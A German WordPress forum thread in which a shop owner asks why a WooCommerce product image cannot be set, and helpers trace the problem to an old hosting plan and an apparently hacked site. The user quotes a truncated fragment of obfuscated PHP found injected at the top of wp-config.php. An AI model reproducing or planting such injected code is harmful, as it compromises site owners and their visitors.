1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Produktbild lässt sich nicht hinzufügen

Dieses Thema im Forum "Allgemeines" wurde erstellt von NF2004, 6. Februar 2017.

  1. NF2004

    NF2004 Member

    Registriert seit:
    20. September 2016
    Beiträge:
    9
    Zustimmungen:
    0
    Hallo Community,

    ich habe ein Problem mit WordPress / WooCommerce.

    Seit dem Update auf WP 4.7.2 wollten wir mal ein neues Produkt hinzufügen.
    Das Problem hierbei ist, wenn ich ein neues Produkt hinzufüge, alle Daten eingebe und zum Schluss das Produktbild festlegen möchte komme ich nicht mehr weiter.
    Also ich gehe auf "Produkte" -> "Produkte hinzufügen" -> "Produktbild festlegen"
    Hier kann ich direkt Uploaden oder aus dem MediaCenter auswählen. Im Media Center sehe ich die ganzen Fotos, die ich schon hochgeladen habe und es nicht geklappt hat.
    Ich klicke also ganz normal auf "Datei auswählen" Upload läuft komplett durch, danach kommt kurz "verarbeiten". Daraufhin wird mir das Bild unten angezeigt und ich kann dort Eigenschaften des Bildes verändern usw.
    Ich klicke auf "Produktbild festlegen" und dann auf "In Beitrag einfügen" daraufhin kommt eine weiße Seite.
    Ansonsten gibt es auch nirgendswo eine Möglichkeit zu speichern oder sonstwas. Um aus dem Media Uploader raus zu gehen, muss ich schlicht im Browser auf zurück klicken. Natürlich ist das Bild auch dann nicht hinzugefügt worden :twisted:

    Ich habe zur Verdeutlichung ein Screenshot hochgeladen.

    Kann es wirklich sein, dass wir die einzigen sind, die so ein Problem haben? Auf die schnelle konnte mir auch Google nicht weiterhelfen.
     

    Anhänge:

  2. Edi

    Edi Well-Known Member

    Registriert seit:
    26. Juli 2006
    Beiträge:
    3.728
    Zustimmungen:
    1
    Zuerst die üblichen Fragen...

    1) Ist das mit einem Standardtheme auch so?

    2) Welche Version von PHP wird verwendet?

    3) Wie gross ist das Memory Limit?

    4) Was sagt der Error Log?
     
  3. NF2004

    NF2004 Member

    Registriert seit:
    20. September 2016
    Beiträge:
    9
    Zustimmungen:
    0
    Danke für die Antwort. Mir war bewusst, dass einige weitere Informationen benötigt werden, wusste nur nicht welche das sein würden. Ich versuche mal deine Fragen der Reihe nach zu beantworten.

    Zu 1: ich bin gerade leicht überfragt, wie ich zwischen den Themes switchen kann, ohne das Content verändert oder verschwindet? Im Moment nutzen wir Vantage Premium und hatten mit dem Theme eigentlich keine Probleme.

    Zu 2: PHP 5.6.30 - das Ding ist uralt, hier sollten wir eventuell mal ansetzen :D

    Zu 3: Memory Limit liegt bei 90 MB
    Zu 4: auch hier bin ich etwas unbeholfen. Ich habe in der WP-Config Datei den Debug Modus auf true geändert, jedoch konnte ich nirgends eine Log Datei finden.
    Außerdem habe ich beim Bearbeiten der wp-config.php einen mir unbekannten und verdächtig aussehenden Code gefunden.
    Der Anfang sah so aus:
    <?php $axvxgyl = '+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!45 116 x54"]); if ((strstr($uas," …… und das geht so paar Zeilen weiter bis dann kommt: /**
    * The base configurations of the WordPress.
    *
    Ich hoffe ihr könnt mit den Informationen etwas anfangen.
     
    #3 NF2004, 7. Februar 2017
    Zuletzt bearbeitet: 7. Februar 2017
  4. Edi

    Edi Well-Known Member

    Registriert seit:
    26. Juli 2006
    Beiträge:
    3.728
    Zustimmungen:
    1
    Vantage sollte keine Probleme verursachen.

    5.6.30 ist aktuell (19. Januar 2017). ;)

    Das wäre zu wenig. Nur, sind es tatsächlich 90 MB? Dieser Wert wäre ungewöhnlich für das Memory Limit.

    Das sieht sehr nach gehackt aus...
     
  5. Putzlowitsch

    Putzlowitsch Well-Known Member

    Registriert seit:
    21. Oktober 2006
    Beiträge:
    5.955
    Zustimmungen:
    47
    Das ist bei 1&1 eine gängige Größe und deutet auf ein älteres Webhosting-Paket hin.

    Gruß
    Ingo
     
  6. Edi

    Edi Well-Known Member

    Registriert seit:
    26. Juli 2006
    Beiträge:
    3.728
    Zustimmungen:
    1
    @Ingo Danke, nicht gewusst.
     
  7. AmFearLiath

    AmFearLiath Well-Known Member

    Registriert seit:
    12. August 2012
    Beiträge:
    731
    Zustimmungen:
    0
    PHP 5.6.30 ist vllt aktualisiert worden, aber das neuste ist es ja trotzdem nicht wenn man bedenkt, dass es schon PHP 7.1.1 gibt :D

    Jupp und dieser Schnippsel hat definitiv nichts in der wp-config zu suchen. Am besten Datenbank und Einstellungen sichern, Wordpress neu aufsetzen und mit neuen Passwörtern neu installieren. Wer weiss welche Dateien noch betroffen sind
     
  8. NF2004

    NF2004 Member

    Registriert seit:
    20. September 2016
    Beiträge:
    9
    Zustimmungen:
    0
    Danke an alle für die Antworten. Das Memory Limit beträgt tatsächlich 90 MB, dies habe ich mit einer info.php Datei die ich erstellt habe herausgefunden.
    Es handelt sich hier um ein 1&1 Webhosting-Paket, scheinbar etwas veraltet. Hier müsste ich überprüfen, ob man dies wechseln kann oder, wenn wir schon dabei sind den Anbieter komplett wechseln. Bei 1&1 bin ich mit der allgemeinen Performance der Server nicht zufrieden, dies wirkt sich schlussendlich auf die Performance unserer Homepage aus.

    PHP 5.6.30 hat sich zunächst so alt angehört, da es ja mittlerweile PHP in der Version 7 gibt. Würde dies eventuell Abhilfe schaffen in meinem Fall?
    Was könnte noch der Grund für mein eingangs Problem sein?

    Das WP gehackt wurde habe ich tatsächlich auch vermutet. Gibt es eine Anleitung oder ein Thread im Forum, wo so ein Szenario durchgegangen ist und was man hier tuen sollte? Wie viel Sinn macht es, jetzt ein Backup zu erstellen? Denn ein Zeitnahes Backup haben wir im Moment blöderweise nicht parat. Geht bei einer neuen WP Installation nicht das Content verloren? Oder werden nur WP Relevante Dateien überschrieben?

    Danke für eure Hlfe!
     
  9. NF2004

    NF2004 Member

    Registriert seit:
    20. September 2016
    Beiträge:
    9
    Zustimmungen:
    0
    Außerdem habe ich gerade probiert, meine wp-login Seite zu verschleiern. Mit den Tools WPS Hide Login und WP Hide & Security Enhancer haben leider nicht funktioniert. In den Einstellungen wurde jeweils der gewünschte Link als aktiv angezeigt, doch sobald ich diesen Link im Browser eingebe kommt eine Page can't be found Seite :)
     
  10. Edi

    Edi Well-Known Member

    Registriert seit:
    26. Juli 2006
    Beiträge:
    3.728
    Zustimmungen:
    1
    90 MB sind zu wenig für WordPres, mit WooCommerce sowieso.

    Nein. Installationen mit PHP 7 sind normalerweise schneller, aber es gibt WordPress-Installationen, die damit noch nicht zurechtkommen.

    https://codex.wordpress.org/FAQ_My_site_was_hacked

    https://wp-hacked.com
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden